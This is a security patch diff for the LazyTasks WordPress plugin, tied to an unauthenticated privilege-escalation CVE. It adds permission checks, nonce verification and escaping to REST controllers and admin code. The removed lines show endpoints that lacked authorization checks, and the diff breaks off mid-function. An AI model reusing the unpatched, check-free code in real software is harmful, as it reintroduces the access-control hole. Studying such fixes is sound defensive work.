CVE-2025-68869: LazyTasks <= 1.2.37 – Unauthenticated Privilege Escalation (lazytasks-project-task-management)

--- a/lazytasks-project-task-management/admin/class-lazytask-admin.php
+++ b/lazytasks-project-task-management/admin/class-lazytask-admin.php
@@ -75,9 +75,19 @@
 		 * between the defined hooks and the functions defined in this
 		 * class.
 		 */
-		// phpcs:ignore WordPress.Security.NonceVerification.Recommended
-		if (isset($_REQUEST['page']) && str_contains($_REQUEST['page'], 'lazytasks-page')){
-			wp_enqueue_style( 'lazytasks-style', plugin_dir_url( __FILE__ ) . 'frontend/build/index.css', array(), $this->version, 'all');
+		// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+		if ( isset( $_REQUEST['page'] ) ) {
+			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+			$page = sanitize_key( wp_unslash( $_REQUEST['page'] ) );
+			if ( str_contains( $page, 'lazytasks-page' ) ) {
+				wp_enqueue_style(
+					'lazytasks-style',
+					plugin_dir_url( __FILE__ ) . 'frontend/build/index.css',
+					array(),
+					$this->version,
+					'all'
+				);
+			}
 		}
 		wp_enqueue_style( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'css/pms-rbs-admin.css', array(), $this->version, 'all' );

@@ -102,41 +112,45 @@
 		 * class.
 		 */

-		// phpcs:ignore WordPress.Security.NonceVerification.Recommended
-        if (isset($_REQUEST['page']) && str_contains($_REQUEST['page'], 'lazytasks-page')) {
-	        $userController = new LazytaskControllerLazytask_UserController();
-			$userResponse = $userController->admin_after_auth_login();
-
-            wp_enqueue_script('lazytasks-script', plugin_dir_url(__FILE__) . 'frontend/build/index.js', array('jquery', 'wp-element'), LAZYTASK_VERSION, true);
-
-			$license_status = get_option('lazytask_license_activate');
-			$premium_installed = get_option('lazytask_premium_installed');
-			$lazytask_premium_activated_date = get_option('lazytask_premium_activated_date');
-			//remaining days now to activation date
-	        if ($lazytask_premium_activated_date) {
-		        $activated_date = new DateTime($lazytask_premium_activated_date);
-		        $current_date = new DateTime();
-		        $interval = $current_date->diff($activated_date);
-		        $days_diff = $interval->days;
-		        if ($interval->invert == 0) {
-			        $days_diff = -$days_diff; // If the activation date is in the future, make days_diff negative
-		        }
-	        }
-			$whiteboard_installed = get_option('lazytasks_whiteboard_installed');
-
-			wp_localize_script('lazytasks-script', 'appLocalizer', [
-                'apiUrl' => home_url('/wp-json'),
-                'homeUrl' => home_url(''),
-                'nonce' => wp_create_nonce('wp_rest'),
-	            'is_admin' => 1,
-				'userResponse' => $userResponse,
-				'i18n' => LazytaskServicesTransStrings::getStrings(),
-				'licenseStatus' => $license_status,
-				'premiumInstalled' => $premium_installed,
-				'whiteboardInstalled' => $whiteboard_installed,
-				'remainingDays' => $days_diff ?? 0,
-			]);
-        }
+		// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+		if ( isset( $_REQUEST['page'] ) ) {
+			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+			$page = sanitize_key( wp_unslash( $_REQUEST['page'] ) );
+			if ( str_contains( $page, 'lazytasks-page' ) ) {
+				$userController = new LazytaskControllerLazytask_UserController();
+				$userResponse = $userController->admin_after_auth_login();
+
+				wp_enqueue_script('lazytasks-script', plugin_dir_url(__FILE__) . 'frontend/build/index.js', array('jquery', 'wp-element'), LAZYTASK_VERSION, true);
+
+				$license_status = get_option('lazytask_license_activate');
+				$premium_installed = get_option('lazytask_premium_installed');
+				$lazytask_premium_activated_date = get_option('lazytask_premium_activated_date');
+				//remaining days now to activation date
+				if ($lazytask_premium_activated_date) {
+					$activated_date = new DateTime($lazytask_premium_activated_date);
+					$current_date = new DateTime();
+					$interval = $current_date->diff($activated_date);
+					$days_diff = $interval->days;
+					if ($interval->invert == 0) {
+						$days_diff = -$days_diff; // If the activation date is in the future, make days_diff negative
+					}
+				}
+				$whiteboard_installed = get_option('lazytasks_whiteboard_installed');
+
+				wp_localize_script('lazytasks-script', 'appLocalizer', [
+					'apiUrl' => home_url('/wp-json'),
+					'homeUrl' => home_url(''),
+					'nonce' => wp_create_nonce('wp_rest'),
+					'is_admin' => 1,
+					'userResponse' => $userResponse,
+					'i18n' => LazytaskServicesTransStrings::getStrings(),
+					'licenseStatus' => $license_status,
+					'premiumInstalled' => $premium_installed,
+					'whiteboardInstalled' => $whiteboard_installed,
+					'remainingDays' => $days_diff ?? 0,
+				]);
+			}
+		}


 	}
@@ -281,6 +295,10 @@
 	//database migration
 	public function lazytask_database_migrate()
 	{
+		//manage_options capability check
+		if( !current_user_can('manage_options') ) {
+			return;
+		}
 		if( !defined('LAZYTASK_DB_VERSION') || get_option('lazytask_db_version')==='' || version_compare(get_option('lazytask_db_version'), LAZYTASK_DB_VERSION, '<') ) {
 			update_option('lazytask_db_version', LAZYTASK_DB_VERSION, 'no');
 			LazytaskHelperLazytask_DBMigrator::run();
@@ -295,11 +313,11 @@
 			return;
 		}

-		// Only block editing if this is the protected page
+		// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
 		if ( isset($_GET['post']) && (int) $_GET['post'] === $page_id ) {
 			wp_die(
-				__('You are not allowed to edit this page.', 'lazytask'),
-				__('Access denied', 'lazytask'),
+				esc_html__( 'You are not allowed to edit this page.', 'lazytasks-project-task-management' ),
+				esc_html__( 'Access denied', 'lazytasks-project-task-management' ),
 				array('response' => 403)
 			);
 		}
--- a/lazytasks-project-task-management/admin/frontend/build/index.asset.php
+++ b/lazytasks-project-task-management/admin/frontend/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-element'), 'version' => 'f0710113234d27eb1ebf');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-element'), 'version' => '2ca8d206c222a4107ad5');
--- a/lazytasks-project-task-management/includes/class-lazytask-activator.php
+++ b/lazytasks-project-task-management/includes/class-lazytask-activator.php
@@ -34,9 +34,9 @@
 	 */
 	public static function activate()
 	{
-		// Free QR Code Generator
-		Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
-
+		if(extension_loaded('gd')  && extension_loaded('mbstring')){
+			Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
+		}
 		LazytaskHelperLazytask_DatabaseTableSchema::run();

 		if( !defined('LAZYTASK_DB_VERSION') || get_option('lazytask_db_version')==='' || version_compare(get_option('lazytask_db_version'), LAZYTASK_DB_VERSION, '<') ) {
--- a/lazytasks-project-task-management/includes/class-lazytask-deactivator.php
+++ b/lazytasks-project-task-management/includes/class-lazytask-deactivator.php
@@ -31,34 +31,85 @@
 	 * @since    1.0.0
 	 */
 	public static function deactivate() {
-		if (defined('LAZYTASKS_PREMIUM_VERSION')) {
-			activate_plugin( plugin_basename( __FILE__ ) ); // Deactivate our plugin
+		if ( ! is_admin() || ! current_user_can( 'activate_plugins' ) ) {
+			return;
+		}
+
+		$plugin = isset( $_REQUEST['plugin'] )
+			? sanitize_text_field( wp_unslash( $_REQUEST['plugin'] ) )
+			: '';
+
+		// Verify nonce
+		$nonce = isset( $_REQUEST['_wpnonce'] )
+			? sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) )
+			: '';
+
+		if ( empty( $nonce ) || ! wp_verify_nonce( $nonce, 'deactivate-plugin_' . $plugin ) ) {
 			wp_die(
-				'You must deactivate the "Lazytasks Premium Mobile App" plugin before deactivating this plugin.<br><br><a href="' . admin_url('plugins.php') . '" class="button button-primary">Back to Plugins</a>',
-				'Plugin Deactivation Error',
-				array('back_link' => true)
+				esc_html__( 'Invalid deactivation request.', 'lazytasks-project-task-management' ),
+				esc_html__( 'Plugin Deactivation Error', 'lazytasks-project-task-management' ),
+				array( 'back_link' => true )
 			);
 		}
-		if (defined('LAZYTASKS_WHITEBOARD_VERSION')) {
-			activate_plugin( plugin_basename( __FILE__ ) ); // Deactivate our plugin
+
+		// Back link safely escaped
+		$back_url  = esc_url( admin_url( 'plugins.php' ) );
+		$back_text = esc_html__( 'Back to Plugins', 'lazytasks-project-task-management' );
+
+		$back_link = sprintf(
+			'<a href="%s" class="button button-primary">%s</a>',
+			$back_url,
+			$back_text
+		);
+
+		// Allowed tags for HTML output
+		$allowed = array(
+			'a'      => array(
+				'href'  => true,
+				'class' => true,
+				'title' => true,
+			),
+			'strong' => array(),
+			'br'     => array(),
+		);
+
+		// Premium block
+		if ( defined( 'LAZYTASKS_PREMIUM_VERSION' ) ) {
+			$raw_message = sprintf(
+			/* translators: %1$s: plugin name, %2$s: back link HTML */
+				__( 'You must deactivate the <strong>%1$s</strong> plugin before deactivating this plugin.<br><br>%2$s', 'lazytasks-project-task-management' ),
+				esc_html__( 'Lazytasks Premium Mobile App', 'lazytasks-project-task-management' ),
+				$back_link
+			);
+
 			wp_die(
-				'You must deactivate the "Lazytasks Whiteboard Addon" plugin before deactivating this plugin.<br><br><a href="' . admin_url('plugins.php') . '" class="button button-primary">Back to Plugins</a>',
-				'Plugin Deactivation Error',
-				array('back_link' => true)
+				wp_kses( $raw_message, $allowed ),  // Escaped output
+				esc_html__( 'Plugin Deactivation Error', 'lazytasks-project-task-management' ),
+				array( 'back_link' => true )
 			);
 		}
-
-		// $login_page_id = get_option('lazytask_page_id');

-		// if($login_page_id)
-		// 	wp_delete_post($login_page_id, true);
+		// Whiteboard block
+		if ( defined( 'LAZYTASKS_WHITEBOARD_VERSION' ) ) {
+			$raw_message = sprintf(
+			/* translators: %1$s: plugin name, %2$s: back link HTML */
+				__( 'You must deactivate the <strong>%1$s</strong> plugin before deactivating this plugin.<br><br>%2$s', 'lazytasks-project-task-management' ),
+				esc_html__( 'Lazytasks Whiteboard Addon', 'lazytasks-project-task-management' ),
+				$back_link
+			);

-		// delete_option('lazytask_page_id');
+			wp_die(
+				wp_kses( $raw_message, $allowed ),  // Escaped output
+				esc_html__( 'Plugin Deactivation Error', 'lazytasks-project-task-management' ),
+				array( 'back_link' => true )
+			);
+		}

-		delete_option('lazytask_do_activation_redirect');
-		delete_option('lazytasks_config');
+		// Cleanup
+		delete_option( 'lazytask_do_activation_redirect' );
+		delete_option( 'lazytasks_config' );
+	}


-	}

 }
--- a/lazytasks-project-task-management/includes/class-lazytask-i18n.php
+++ b/lazytasks-project-task-management/includes/class-lazytask-i18n.php
@@ -35,11 +35,11 @@
 	 */
 	public function lazytask_load_plugin_textdomain() {

-		load_plugin_textdomain(
+		/*load_plugin_textdomain(
 			'lazytasks-project-task-management',
 			false,
 			dirname( dirname( plugin_basename( __FILE__ ) ) ) . '/languages/'
-		);
+		);*/

 	}

--- a/lazytasks-project-task-management/lazytask.php
+++ b/lazytasks-project-task-management/lazytask.php
@@ -10,9 +10,9 @@
  * Plugin Name:       LazyTasks - Project & Task Management with Collaboration, Kanban and Gantt Chart
  * Plugin URI:        https://lazycoders.co/lazytasks
  * Description:       Comprehensive Task and Project Management: Create, assign, follow, and comment on tasks with ease. Our user-friendly interface ensures your projects are always on track and accessible.
- * Version:           1.2.37
+ * Version:           1.3.01
  * Requires at least: 6.2
- * Tested up to:      6.8.3
+ * Tested up to:      6.9
  * Requires PHP:      7.4
  * Author:            Lazycoders
  * Author URI:        https://lazycoders.co
@@ -34,15 +34,15 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'LAZYTASK_VERSION', '1.2.37' );
+define( 'LAZYTASK_VERSION', '1.3.01' );

-define( 'LAZYTASK_DB_VERSION', '1.1.88' );
+define( 'LAZYTASK_DB_VERSION', '1.1.89' );

 define( 'LAZYTASK_TABLE_PREFIX', $wpdb->prefix .'pms_' );

 const LAZYTASK_JWT_SECRET_KEY = SECURE_AUTH_KEY;

-define('LAZYTASK_APP_BUILDER_RESOURCE_URL', 'https://live.appza.net');
+ define('LAZYTASK_APP_BUILDER_RESOURCE_URL', 'https://live.appza.net');


 /**
--- a/lazytasks-project-task-management/public/class-lazytask-public.php
+++ b/lazytasks-project-task-management/public/class-lazytask-public.php
@@ -81,8 +81,8 @@
 				wp_enqueue_style( 'lazytasks-style', plugin_dir_url( __DIR__ ) . 'admin/frontend/build/index.css', array(), $this->version, 'all');
 			}else{
 				// redirect to home page
-				wp_redirect(home_url());
-            	exit;
+				wp_safe_redirect( home_url() );
+				exit;
 			}
 		}

@@ -141,7 +141,7 @@
 				]);
 			}else{
 				// redirect to home page
-				wp_redirect(home_url());
+				wp_safe_redirect( home_url() );
             	exit;
 			}
 		}
--- a/lazytasks-project-task-management/src/Controller/Lazytask_CompanyController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_CompanyController.php
@@ -69,6 +69,13 @@
 	}

 	public function create(WP_REST_Request $request){
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['create-workspace'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 //		$requestData = json_decode($request->get_body(), true);
@@ -161,6 +168,13 @@
 	}

 	public function update(WP_REST_Request $request){
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['create-workspace', 'edit-workspace', 'add-member-to-project-send-invite', 'remove-member-from-project'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);

@@ -331,6 +345,13 @@
 	}

 	public function show(WP_REST_Request $request){
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;

 		// Sanitize and validate the input data
@@ -349,6 +370,13 @@
 	}

 	public function delete(WP_REST_Request $request){
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['delete-workspace'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);

--- a/lazytasks-project-task-management/src/Controller/Lazytask_MyZenTaskController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_MyZenTaskController.php
@@ -11,6 +11,13 @@
 	const TABLE_MY_ZEN_TASKS = LAZYTASK_TABLE_PREFIX . 'my_zen_tasks';

 	public function getAllMyZenTasks(WP_REST_Request $request) {
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['view-only-access'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$token = $request->get_header('Authorization');
 		$token = str_replace('Bearer ', '', $token);
@@ -52,7 +59,13 @@

 	}

-	public function create( WP_REST_Request $request ) {
+	public function create( WP_REST_Request $request )
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}

 		global $wpdb;

@@ -128,7 +141,14 @@

 	}

-	public function update( WP_REST_Request $request ) {
+	public function update( WP_REST_Request $request )
+	{
+		//permission check
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}

 		global $wpdb;

--- a/lazytasks-project-task-management/src/Controller/Lazytask_NotificationController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_NotificationController.php
@@ -22,7 +22,7 @@
 	}

 	private function init() {
-		add_filter('lazycoder_integrated_action_list', [$this, 'extendedNotificationAction']);
+		add_filter('lazytask_integrated_action_list', [$this, 'extendedNotificationAction']);
 	}
     public function extendedNotificationAction($preDefineActionList) {
 		$actionList = $this->actionList;
@@ -30,7 +30,14 @@
 	}


-	public function getNotificationActionList() {
+	public function getNotificationActionList( WP_REST_Request $request )
+	{
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}

 		$actionList = Integrations::registeredActionLists();

@@ -38,10 +45,14 @@
 	}


-	public function getNotificationChannels() {
-		global $wpdb;
-		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
-		$notificationChannelTable = LAZYTASK_TABLE_PREFIX . 'notification_channels';
+	public function getNotificationChannels( WP_REST_Request $request )
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		$notificationChannels = self::getChannels();
 		try {
 			if($notificationChannels) {
@@ -62,7 +73,13 @@
 		return $notificationChannels;
 	}

-	public function getNotificationTemplates() {
+	public function getNotificationTemplates( WP_REST_Request $request )
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -83,7 +100,14 @@
 	}

 	// create notification template
-	public function createNotificationTemplate(WP_REST_Request $request) {
+	public function createNotificationTemplate(WP_REST_Request $request)
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -115,7 +139,13 @@
 	}

 	//show notification template by id
-	public function showNotificationTemplate(WP_REST_Request $request) {
+	public function showNotificationTemplate(WP_REST_Request $request)
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -149,7 +179,13 @@
 	}

 	//editNotificationTemplate
-	public function editNotificationTemplate(WP_REST_Request $request) {
+	public function editNotificationTemplate(WP_REST_Request $request)
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -182,7 +218,13 @@
 	}

 	//delete notification template by id
-	public function deleteNotificationTemplate(WP_REST_Request $request) {
+	public function deleteNotificationTemplate(WP_REST_Request $request)
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -343,7 +385,29 @@
 		$userId = $request->get_param('user_id');
 		$channels = $request->get_param('channels');
 		$notification_ids = $request->get_param('notification_ids');
-
+
+		$userController = new Lazytask_UserController();
+		$getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+		if (is_wp_error($getCurrentUserResponse)) {
+			return $getCurrentUserResponse;
+		}
+
+		$statusCode = $getCurrentUserResponse->get_status();
+		if($statusCode != 200){
+			return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+		}
+
+		$getCurrentUser = $getCurrentUserResponse->get_data();
+		$loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+		if ( $userId != $loggedInUserId) {
+			return new WP_REST_Response([
+				'status' => 403,
+				'message' => 'Forbidden: You can only modify your own notifications'
+			], 403);
+		}
+
+
 		// Validate parameters
 		if (!$notification_ids || !$userId || !$channels) {
 			return new WP_REST_Response([
--- a/lazytasks-project-task-management/src/Controller/Lazytask_ProjectController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_ProjectController.php
@@ -13,6 +13,13 @@

 	const TABLE_PROJECTS = LAZYTASK_TABLE_PREFIX . 'projects';
 	public function getAllProjects(WP_REST_Request $request){
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['view-only-access', 'create-project', 'create-workspace'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);

@@ -74,6 +81,11 @@

 	public function create(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['create-project'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);

@@ -276,6 +288,12 @@
 	}

 	public function update(WP_REST_Request $request){
+
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['edit-project', 'add-member-to-project-send-invite', 'remove-member-from-project'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$projectTableName = LAZYTASK_TABLE_PREFIX . 'projects';
@@ -456,7 +474,7 @@
 					$args = array_merge($taskIds, [(int)$requestData['deleted_member_id']]);

 					// Execute the query
-					$wpdb->query($wpdb->prepare($sql, ...$args));
+					$db->query($db->prepare($sql, ...$args));
 				}

 			}
@@ -532,6 +550,12 @@

 	public function delete(WP_REST_Request $request){

+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['delete-project'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		// Sanitize and validate the input data
 		$id = $request->get_param('id');
 		$requestData = $request->get_json_params();
@@ -602,6 +626,11 @@
 	// Function for project archive
 	public function archiveProject(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['project-archive-unarchive'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$projectsTable = LAZYTASK_TABLE_PREFIX . 'projects';
@@ -643,6 +672,11 @@
 	// Function for project unarchive
 	public function unarchiveProject(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['project-archive-unarchive'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$projectsTable = LAZYTASK_TABLE_PREFIX . 'projects';
@@ -1296,6 +1330,32 @@
 		$requestData = $request->get_params();
 		$project = $this->getProjectById($projectId);

+		$userController = new Lazytask_UserController();
+		$getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+		if (is_wp_error($getCurrentUserResponse)) {
+			return $getCurrentUserResponse;
+		}
+
+		$statusCode = $getCurrentUserResponse->get_status();
+		if($statusCode != 200){
+			return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+		}
+
+		$getCurrentUser = $getCurrentUserResponse->get_data();
+		$loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+		$isAdministrator = in_array('administrator', $getCurrentUser['data']['roles']);
+		$isAddMemberToProject = in_array('add-member-to-project-send-invite', $getCurrentUser['data']['llc_permissions']);
+		$isManageWorkspaceAndProjects = in_array('manage-workspace-projects', $getCurrentUser['data']['llc_permissions']);
+
+		// Check if user is a member of the project
+		$isProjectMember = $project['members'] && sizeof($project['members']) > 0 && array_filter($project['members'], function($member) use ($loggedInUserId) {
+				return $member['id'] == $loggedInUserId;
+			});
+
+		if (!$isAdministrator && !$isAddMemberToProject && !$isManageWorkspaceAndProjects && !$isProjectMember) {
+			return new WP_REST_Response(['status' => 403, 'message' => 'Forbidden: You do not have access to this project', 'data' => []], 403);
+		}

 		$returnArray = [];
 		if ($project){
@@ -1402,6 +1462,32 @@
 		$requestData = $request->get_params();
 		$project = $this->getProjectById($projectId);

+		$userController = new Lazytask_UserController();
+		$getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+		if (is_wp_error($getCurrentUserResponse)) {
+			return $getCurrentUserResponse;
+		}
+
+		$statusCode = $getCurrentUserResponse->get_status();
+		if($statusCode != 200){
+			return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+		}
+
+		$getCurrentUser = $getCurrentUserResponse->get_data();
+		$loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+		$isAdministrator = in_array('administrator', $getCurrentUser['data']['roles']);
+		$isAddMemberToProject = in_array('add-member-to-project-send-invite', $getCurrentUser['data']['llc_permissions']);
+
+		// Check if user is a member of the project
+		$isProjectMember = $project['members'] && sizeof($project['members']) > 0 && array_filter($project['members'], function($member) use ($loggedInUserId) {
+			return $member['id'] == $loggedInUserId;
+		});
+
+		if (!$isAdministrator && !$isAddMemberToProject && !$isProjectMember) {
+			return new WP_REST_Response(['status' => 403, 'message' => 'Forbidden: You do not have access to this project', 'data' => null], 403);
+		}
+

 		$returnArray = [];
 		if ($project){
@@ -1448,6 +1534,33 @@
 			return new WP_REST_Response(['status' => 404, 'message' => 'No project found', 'data' => null], 200);
 		}

+		$userController = new Lazytask_UserController();
+		$getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+		if (is_wp_error($getCurrentUserResponse)) {
+			return $getCurrentUserResponse;
+		}
+
+		$statusCode = $getCurrentUserResponse->get_status();
+		if($statusCode != 200){
+			return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+		}
+
+		$getCurrentUser = $getCurrentUserResponse->get_data();
+		$loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+		$isAdministrator = in_array('administrator', $getCurrentUser['data']['roles']);
+		$isAddMemberToProject = in_array('add-member-to-project-send-invite', $getCurrentUser['data']['llc_permissions']);
+
+		// Check if user is a member of the project
+		$isProjectMember = $project['members'] && sizeof($project['members']) > 0 && array_filter($project['members'], function($member) use ($loggedInUserId) {
+				return $member['id'] == $loggedInUserId;
+			});
+
+		if (!$isAdministrator && !$isAddMemberToProject && !$isProjectMember) {
+			return new WP_REST_Response(['status' => 403, 'message' => 'Forbidden: You do not have access to this project', 'data' => []], 403);
+		}
+
+
 		$companyController = new Lazytask_CompanyController();
 		$company = $companyController->getCompanyById($project['company_id'], $request);
 		$project['parent'] = $company;
@@ -1484,7 +1597,7 @@
 		$limit = (int) $request->get_param('limit') ?: 10;
 		$offset = (int) $request->get_param('offset') ?: 0;

-		// Step 1: Get section ID from slug
+		// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 		$section = $wpdb->get_row($wpdb->prepare(
 			"SELECT id FROM {$wpdb->prefix}pms_task_sections WHERE slug = %s AND project_id = %d",
 			$sectionSlug,
@@ -1548,6 +1661,7 @@
 				'offset' => $offset
 			];
 		}else{
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$priority = $wpdb->get_row($wpdb->prepare(
 				"SELECT id, name, color_code FROM {$wpdb->prefix}pms_project_priorities WHERE id = %d AND project_id = %d",
 				$priorityId,
@@ -1617,7 +1731,7 @@
 				'offset' => $offset
 			];
 		}else{
-
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$status = $wpdb->get_row($wpdb->prepare(
 				"SELECT id, name, color_code, slug FROM {$wpdb->prefix}pms_project_statuses WHERE id = %d AND project_id = %d",
 				$statusId,
@@ -1683,7 +1797,7 @@
 				'offset' => $offset
 			];
 		}else{
-
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$member = $wpdb->get_row($wpdb->prepare(
 				"SELECT id, display_name FROM {$wpdb->prefix}users WHERE id = %d",
 				$memberId
--- a/lazytasks-project-task-management/src/Controller/Lazytask_SettingController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_SettingController.php
@@ -13,7 +13,27 @@

 	public function get_settings(WP_REST_Request $request)
 	{
-		$settings = get_option('lazytask_settings', []);
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['view-only-access', 'create-task', 'edit-task', 'general-settings'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
+		$getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+		if (is_wp_error($getCurrentUserResponse)) {
+			return $getCurrentUserResponse;
+		}
+
+		$statusCode = $getCurrentUserResponse->get_status();
+		if($statusCode != 200){
+			return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+		}
+
